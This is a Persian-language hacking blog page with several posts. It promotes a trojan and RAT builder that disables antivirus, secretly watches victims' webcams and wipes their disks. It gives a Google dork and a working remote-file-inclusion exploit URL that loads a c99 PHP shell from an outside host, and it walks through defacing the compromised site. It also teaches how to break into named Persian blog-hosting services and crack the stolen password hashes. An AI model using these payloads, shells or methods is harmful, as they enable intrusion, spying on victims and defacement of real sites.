طرز کار برنامه هم بسیار ساده هستش بعد از کانکت شدن برنامه رو باز کنید منتظر بمانید یکی از سه چراغ برنامه سبز شود .بعد از سبز شدن یکی از سه چراغها اینترنت اکسپلور را باز کنید وارد سایت مورد نظر خود شوید
برای باز کردن برنامه از این پسورد استفاده کنید pro دانلود برنامه
اولین کاری که باید انجام بدهید باید انتی ویروس خود را غیر فعال کنید به دلیل اینکه می خواهید یک
تروجان قوی بسازید
توجه توجه: این برنامه یکی از قوی ترین برنامه ها ی هک سیستم در حال حاظر هستش
به راحتی می توانید در سی دی رام را باز بسته کنید
تمام ویندوز قربانی را دست کاری کنید
تمامی ایدی های قربانی را هک کنید
از صفحه مانیتور قربانی دیدن کنید و عکس بندازید
بدون اینکه چراغ وبکم قربانی روشن شود شما می توانید از وبکم قربانی دیدن کنید و عکس بندازید
می توانید از کل هارد ان کپی برداری کنید
می توانید کل هارد قربانی را پاک کنید
همزمان چند هکر باز به سیستم قربانی وصل کنید
این برنامه جدیدترین برنامه ویروس و تروجان سازی را در خود دارد
شما می توانید طوری تروجان بسازید که هیچ انتی ویروسی نمی توانند به تروجان شما گیر بدهد
بیش از ۴۰۰ کار حرفه ای دیگر هم انجام می دهد
هشدار>>>> هرکس این برنامه رو دانلود کنه من خودم اولین نفری هستم که به سیستمش وصل میشم
اول این عبارت رو تو گوگل سرچ کنید و در ضمن برای راحتی کار به صفحات اخر سرچ برید چون سایتهایی که در صفحات اولیه هستند قبلا هک شدند
"Google Search : "© Sabdrimer CMS
Exploit :
http://www.website.com/skins/advanced/advanced1.php?pluginpath[0]=[evil_]
My PHP Shell Address : http://www.godekalb.com/data/c99.txt?
که در کد بالا به جای [evil_] باید کد پایینیشو رو قرار بدید که کد Exploit کامل میشه :
http://www.website.com/skins/advanced/advanced1.php?pluginpath[0]=http://www.godekalb.com/data/c99.txt?
حالا مثلا شما یه سایت رو پیدا کردید که اخر ادرسش به صورت http://www.website.com/Index.php است شما باید index.php رو پاک کنید و کد بالا رو به جاش کپی کنید
البته موقع کپی حواستون باشه قسمت http://www.website.com رو همراه کد کپی نکنید
و بعد از این کار حالا اینتر کنید و فایل c99.txt که قبلا یه جا آپلود کردیم (که من برای راحتی شما قبلا آپلود کردم) تو سایتمون Inclusion میکنیم
بعد از وارد شدن به قسمت مدیریت اون وارد شاخه Public html بشید مثل تصویر و بعد اون پاییش وارد این دایرکتوری بشید و بعد اون پایین اون صفحه *.html که خودتون از قبل ساختید رو از تو هارد تون انتخاب و اپلود کنید و جایگزین صفحه سایت اصلی کنید
بعد تو قسمت ادرس بار مرورگرتون این ادرس رو تایپ کنید و حال کنید
که "فایل شما" نام فایل Html است که شما آپلود کردید
چندتا از دوستان به من ایمیل زده بودند و گفته بودن که آموزش هک کردن وبلاگ را بده من هم گفتم چشم اما دوستان عزیز یادتان باشد من به طور صریح و واضح این آموزش را نمی دم علتش هم به دلیل مسایل امنیتی است.یکی از دوستان از من پرسیدند که تو چه نوع هکری هستی؟کلاه سیاه یا کاله سفید؟ در جواب ایشان باید بگم که من یک هکر کلاه سفید هستم چون دوست ندارم برم وبلاگ ها یا سایت های مردم را بی خود و بی جهت هک کنم به نظر من اگر می خواهید یک هکر کلاه سیاه خوب شوید باید از مسایلی که هکرهای کلاه سفید با آن سر و کار دارند سر در بیارید چون هکرهای کلاه سیاه((اون طوری که من با چندتاشون صحبت کردم))می گن ما فقط دنبال راه های نفوذ به سیستم ها هستیم و با مسایل ضد هک زیاد آشنایی نداریم اما هکرهای کلاه سفید هم نحوه ی هک کردن را می دانند و هم ضد هک که این کمک بسیار بزرگی برای آن هاست چون وقتی بخوان به یک سیستم نفوذ کنند اما حالا به هر دلیل اون روش نفوذی شان نگیره می فهمند که قربانی چه کارهای امنیتی کرده و ضد آن را می زنند یا از راه های دیگر اقدام می کنند (*سیاهکر*) البته هر هکر حرفه ای وقتی ببینه نمی شه با یه روش وارد شد قطعا روش دیگر رو امتحان می کنه اما در مسایل بزرگ و سرورهای بزرگتر و مهمتر شاید نتواند آن کار را کند که دلیل اصلی اش کمبود اطلاعاتش است
خوب امروز هم همینطوری که گفتم می خوام روش هک کردن یک وبلاگ به صورت کاملا حرفه ای نه بچه بازی که برای صاحب وبلاگ یه تروجان یا یهMagic-Ps بفرستیم بعد ببینیم که روشمون نگرفته و نا امید شیم.
آموزش هک کردن وبلاگ یا همان آموزش هک وبلاگ
هک کدن یک وبلاگ به صورت حرفه ای کار چندان ساده ای نیست و مستلزم این است که شما با مفاهیم کلی شبکه و کار با نرم افزارهای , IP sniffer NMAP , Nessus بلد باشید و بتوانید با Exploit ها کار کنید البته من نمی خواهم شما را از این کار نا امید کنم ولی بهتر است این نرم افزارها و چیزهایی را که گفتم بلد باشید
خوب ما برای هک کردن یک وبلاگ باید سرور و یا سرویس دهنده ی آن را اول هک کنیم تا بتوانیم رمزها و یوزرنیم های وبلاگ یا وبلاگ های تحت سرویس آن سرور را پیدا کنیم معمولا یوزر نیم ها و یا همان آدرس وبلاگ مثل:
http://www.victim.blogserver.com
که victim آدرس و یوزر نیم وبلاگ است کد بندی نشده است و به راحتی پس از نفوذ به سرویس دهنده ی وبلاگ می توانیم آن را پیدا کنیم اما پسوردها معمولا کدبندی شده اند و ما باید با استفاده از ابزارهای کرک پسورد،آن پسوردها را از حالت کد شده خارج کنیم که من در زیر اسم چندتا برنامه ی معروف کرک پسورد یا Password Cracker را گذاشته ام:
John the ripper
L0pht crack
Palm crack
که می توانید با جستجو در گوگل لینک دانلود آن ها را پیدا کنید و پس از دانلود از آن ها استفاده کنید که کار با آن ها بسیار آسان است بدین ترتیب که شما کلمه ی کد شده را به آن می دید و برنامه نسبت به اندازه ی ((Length)) آن شروع به شکست کد آن می نماید.یادتان باشد که L0pht crack بعد از حرف L صفر یعنی0 را دارد نه O
حالا ما چگونه به یک سرور وارد شویم؟
شما می توانید با پیدا کردن Vulnerability های یک سرویس دهنده ی وبلاگ به کمک برنامه های NAMP و یا Nessus و امتحان Exploit های نوشته شده برای آن آسیب پذیری ها ((Vulnerability)) به سیستم سرور نفوذ کرده و کنترل آن را در دست بگیرید البته این یادتان باشد که فقط به قسمت اطلاعات سرور که معمولا دارای آسیب پذیری است نفوذ کنید و به قسمت های دیگر به هیچ عنوان نوذ نکنید در ضمن این کار با هک کردن سایت فرق می کند اما روش های نزدیک به همی برای انجام هر دوی آن ها استفاده می شود
در این جا من نام چند سرویس دهنده ی وبلاگ های فارسی را از بیشترین آسیب پذیری به کمترین آسیب پذیری می نویسم:
1. Persianblog
2. Mihanblog
3. caspianblog
4. parsiblog
5. blogfa
6.
البته بلاگفا تا چند روز پیش در رده ی دوم قرار داشت اما به دلیل اخذ تدابیر امنیتی خوب در رده ی پنجم جای گرفت.البته من این رده بندی را براساس تعداد وبلاگ های هک شده ی آن سرور،تدابیر امنیتی اتخاذ شده ی آن سرور،تعداد دفعاتی که خودم به آن سرور نفوذ کرده ام و سوال از حدود 16 هکر انجا داده ام.
البته اگر این را برای شما سخت است من در پست بعد روش دیگری را که کمی آسان تر است را به شما می گویم.
خوب این هم از آموزش هک کردن وبلاگ قسمت اول.
یکی از دوستان پرسیده بودند که برنامه ی THC-scan 2.0 را ار سایت اصلی اش دانلود کرده ام اما موقعی که روی برنامه کلیک می کنم صفحه ی سیاهی می یاد و بعدش می ره چه کار کنم؟
دوست عزیز من آسان ترین راه را به شما می گویم اول برنامه یعنی فایل .exe را به پوشه ی System 32 ویندوز خود ببرید و CMD را اجرا کرده و نام برنامه را که در زیر آیکون قرار دارد را در آن بنویسید و Enter کنید و پس از اجرا کار خود را انجام بدید
